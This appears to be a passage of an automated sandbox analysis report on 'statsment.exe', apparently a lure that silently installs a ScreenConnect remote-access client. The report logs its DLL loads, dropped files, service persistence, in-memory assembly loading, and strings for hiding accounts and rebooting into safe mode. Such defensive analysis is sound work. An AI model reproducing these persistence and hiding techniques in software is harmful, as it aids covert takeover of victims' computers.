                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                              Source: C:\Users\user\Desktop\statsment.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                              Source: statsment.exe, Static PE information: certificate valid
                              Source: statsment.exe, Static file information: File size 5652448 > 1048576
                              Source: statsment.exe, Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                              Source: statsment.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: statsment.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: statsment.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: statsment.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: statsment.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: statsment.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: statsment.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800218689.0000000000F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: statsment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: statsment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: statsment.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2983468766.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: statsment.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.2960693212.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800566476.0000000002942000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800109630.0000000000EE0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: statsment.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1735043722.000000000041D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: statsment.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1714393742.00000000049B0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: statsment.exe, 59d159.rbs.2.dr, 59d15a.msi.2.dr, MSID438.tmp.2.dr, 59d158.msi.2.dr, MSID418.tmp.2.dr, MSID756.tmp.2.dr, setup.msi.0.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2983468766.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: statsment.exe, 59d15a.msi.2.dr, 59d158.msi.2.dr, MSICAFF.tmp.1.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: statsment.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800218689.0000000000F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.2983468766.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: statsment.exe
                              Source: statsment.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: statsment.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: statsment.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: statsment.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: statsment.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              Source: 0.2.statsment.exe.2970000.0.raw.unpack, Program.cs, .Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: 0.0.statsment.exe.7878f8.1.raw.unpack, Program.cs, .Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: statsment.exe, Static PE information: real checksum: 0x54fd91 should be: 0x5727ba
                              Source: C:\Users\user\Desktop\statsment.exe, Code function: 0_2_010E6F00 push eax; mov dword ptr [esp], ecx 0_2_010E6F11
                              Source: C:\Users\user\Desktop\statsment.exe, Code function: 0_2_05425522 push eax; retf 0_2_05425529
                              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_3_071071A1 push FFFFFFC3h; ret 4_3_07107179
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, Code function: 7_2_013F7738 push eax; iretd 7_2_013F7739
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, Code function: 7_2_013F7754 push 8401A5CFh; iretd 7_2_013F7759
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, Code function: 7_2_05E34431 push esp; ret 7_2_05E34443
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Code function: 8_2_00007FFD9B6F3453 push ecx; iretd 8_2_00007FFD9B6F350C
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Code function: 8_2_00007FFD9B6F37B3 push edi; iretd 8_2_00007FFD9B6F37B6
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Code function: 8_2_00007FFD9B6F7D94 push ss; iretd 8_2_00007FFD9B6F7D95
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Code function: 9_2_00007FFD9B70987A push cs; iretd 9_2_00007FFD9B709C1F
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Code function: 9_2_00007FFD9B701599 push eax; iretd 9_2_00007FFD9B70159A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Code function: 9_2_00007FFD9B70999F push cs; iretd 9_2_00007FFD9B709C1F
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Code function: 9_2_00007FFD9B703CF2 push eax; iretd 9_2_00007FFD9B703D31

                              Persistence and Installation Behavior

                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                              Source: c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.windowscredentialprovider.dll COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-406f-012c01771397}\inprocserver32
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.Compression.Cab.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Windows.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.Compression.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID756.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID438.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Core.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe
                              Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.InstallerActions.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.ClientService.dll.2.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (de5851ad6e374ce3)

                              Hooking and other Techniques for Hiding and Protection

                              Source: statsment.exe, 00000000.00000002.1714886742.00000000051E0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: statsment.exe, 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: rundll32.exe, 00000004.00000003.1711832278.0000000004C36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.2960693212.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1810192866.000000001B8B2000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800566476.0000000002942000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800109630.0000000000EE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: statsment.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.ClientService.dll.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.Windows.dll.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.4.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: C:\Users\user\Desktop\statsment.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\statsment.exe; Memory allocated: 10E0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statsment.exe; Memory allocated: 2B40000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statsment.exe; Memory allocated: 4B40000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statsment.exe; Memory allocated: 6280000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statsment.exe; Memory allocated: 59E0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statsment.exe; Memory allocated: 7280000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statsment.exe; Memory allocated: 8280000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statsment.exe; Memory allocated: 6280000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statsment.exe; Memory allocated: 8510000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statsment.exe; Memory allocated: 9510000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Memory allocated: 13F0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Memory allocated: 1B70000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Memory allocated: 3B70000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Memory allocated: 1520000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Memory allocated: 1ADD0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Memory allocated: CA0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Memory allocated: 1A9B0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statsment.exe; Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Thread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\rundll32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Windows.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.Compression.Cab.dll
                              Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe
                              Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll
